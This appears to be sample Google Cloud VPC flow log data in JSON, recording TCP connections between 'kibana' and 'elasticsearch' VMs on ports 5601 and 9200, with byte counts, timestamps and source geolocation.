-{"insertId":"y4wffpfk2eroj","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"203.0.113.12","src_port":54662},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:12.142682672Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:12.027895189Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"}
-{"insertId":"y4wffpfk2erow","jsonPayload":{"bytes_sent":"64588","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33560},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"362","reporter":"SRC","rtt_msec":"11","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075859688Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork
_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"}
-{"insertId":"y4wffpfk2erot","jsonPayload":{"bytes_sent":"67315","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33536},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565156020Z","packets_sent":"354","reporter":"DEST","rtt_msec":"194","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150481417Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"}
-{"insertId":"y4wffpfk2eroq","jsonPayload":{"bytes_sent":"175633","connection":{"dest_ip":"10.87.40.76","dest_port":33576,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"67","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510464198Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2ero5","jsonPayload":{"bytes_sent":"116981","connection":{"dest_ip":"203.0.113.134","dest_port":33540,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789112562Z","packets_sent":"234","reporter":"SRC","rtt_msec":"313","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074813982Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"y4wffpfk2eroo","jsonPayload":{"bytes_sent":"67789","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33690},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:48.542406314Z","packets_sent":"344","reporter":"DEST","rtt_msec":"196","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075867049Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.453102376Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.453102376Z"} 
-{"insertId":"ptjoddfhmrhg9","jsonPayload":{"bytes_sent":"136166","connection":{"dest_ip":"203.0.113.134","dest_port":33538,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565124617Z","packets_sent":"245","reporter":"SRC","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074952616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
-{"insertId":"ptjoddfhmrhgh","jsonPayload":{"bytes_sent":"68262","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65257},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220614265Z","packets_sent":"718","reporter":"DEST","rtt_msec":"220","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.403388091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
-{"insertId":"ptjoddfhmrhgj","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":52328},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:20.952481728Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:20.842840991Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
-{"insertId":"ptjoddfhmrhgr","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":59790},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:50.702194466Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:50.590894439Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
-{"insertId":"ptjoddfhmrhgn","jsonPayload":{"bytes_sent":"73681","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65317},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"728","reporter":"DEST","rtt_msec":"62","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.740491697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
-{"insertId":"ptjoddfhmrhga","jsonPayload":{"bytes_sent":"92566","connection":{"dest_ip":"203.0.113.58","dest_port":65317,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"596","reporter":"SRC","rtt_msec":"62","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.740491697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
-{"insertId":"ptjoddfhmrhgk","jsonPayload":{"bytes_sent":"66094","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33692},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565137912Z","packets_sent":"360","reporter":"DEST","rtt_msec":"181","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.558259934Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-proje
ct","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} -{"insertId":"ptjoddfhmrhgm","jsonPayload":{"bytes_sent":"4900","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":65262},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220741828Z","packets_sent":"542","reporter":"DEST","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.251430011Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
-{"insertId":"ptjoddfhmrhgd","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"198.51.100.107","dest_port":52328,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:20.952481728Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:20.842840991Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
-{"insertId":"ptjoddfhmrhgl","jsonPayload":{"bytes_sent":"63280","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33552},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213081491Z","packets_sent":"361","reporter":"DEST","rtt_msec":"21","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075957044Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
-{"insertId":"ptjoddfhmrhgi","jsonPayload":{"bytes_sent":"774029","connection":{"dest_ip":"198.51.100.239","dest_port":37292,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":24940,"city":"Bucharest","continent":"Europe","country":"rou","region":"Bucharest"},"end_time":"2019-06-14T03:49:35.841633589Z","packets_sent":"403","reporter":"SRC","rtt_msec":"102","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:35.048156283Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
-{"insertId":"ptjoddfhmrhgo","jsonPayload":{"bytes_sent":"359272","connection":{"dest_ip":"10.87.40.76","dest_port":33876,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933338264Z","packets_sent":"66","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466706102Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
-{"insertId":"ptjoddfhmrhgp","jsonPayload":{"bytes_sent":"310476","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"198.51.100.239","src_port":37292},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:35.841633589Z","packets_sent":"214","reporter":"DEST","rtt_msec":"102","src_location":{"asn":24940,"city":"Bucharest","continent":"Europe","country":"rou","region":"Bucharest"},"start_time":"2019-06-14T03:40:35.048156283Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
-{"insertId":"ptjoddfhmrhg8","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"198.51.100.107","dest_port":59790,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:50.702194466Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:50.590894439Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
-{"insertId":"ptjoddfhmrhgf","jsonPayload":{"bytes_sent":"209716","connection":{"dest_ip":"203.0.113.134","dest_port":33552,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:55.213081491Z","packets_sent":"262","reporter":"SRC","rtt_msec":"21","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075957044Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
-{"insertId":"ptjoddfhmrhgg","jsonPayload":{"bytes_sent":"165643","connection":{"dest_ip":"203.0.113.134","dest_port":33556,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565214145Z","packets_sent":"256","reporter":"SRC","rtt_msec":"133","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:03.062674441Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"} 
-{"insertId":"ptjoddfhmrhgb","jsonPayload":{"bytes_sent":"65890","connection":{"dest_ip":"203.0.113.58","dest_port":65257,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220614265Z","packets_sent":"593","reporter":"SRC","rtt_msec":"220","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.403388091Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
-{"insertId":"ptjoddfhmrhgs","jsonPayload":{"bytes_sent":"62620","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33538},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565124617Z","packets_sent":"358","reporter":"DEST","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074952616Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
-{"insertId":"ptjoddfhmrhge","jsonPayload":{"bytes_sent":"185520","connection":{"dest_ip":"203.0.113.134","dest_port":33692,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565137912Z","packets_sent":"249","reporter":"SRC","rtt_msec":"181","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.558259934Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
-{"insertId":"ptjoddfhmrhgc","jsonPayload":{"bytes_sent":"33269","connection":{"dest_ip":"203.0.113.58","dest_port":65262,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220741828Z","packets_sent":"517","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.251430011Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
-{"insertId":"ptjoddfhmrhg7","jsonPayload":{"bytes_sent":"58811","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33556},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565214145Z","packets_sent":"358","reporter":"DEST","rtt_msec":"133","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:03.062674441Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
-{"insertId":"ptjoddfhmrhgq","jsonPayload":{"bytes_sent":"5220","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33876},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933338264Z","packets_sent":"86","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466706102Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:15.857334727Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:15.857334727Z"}
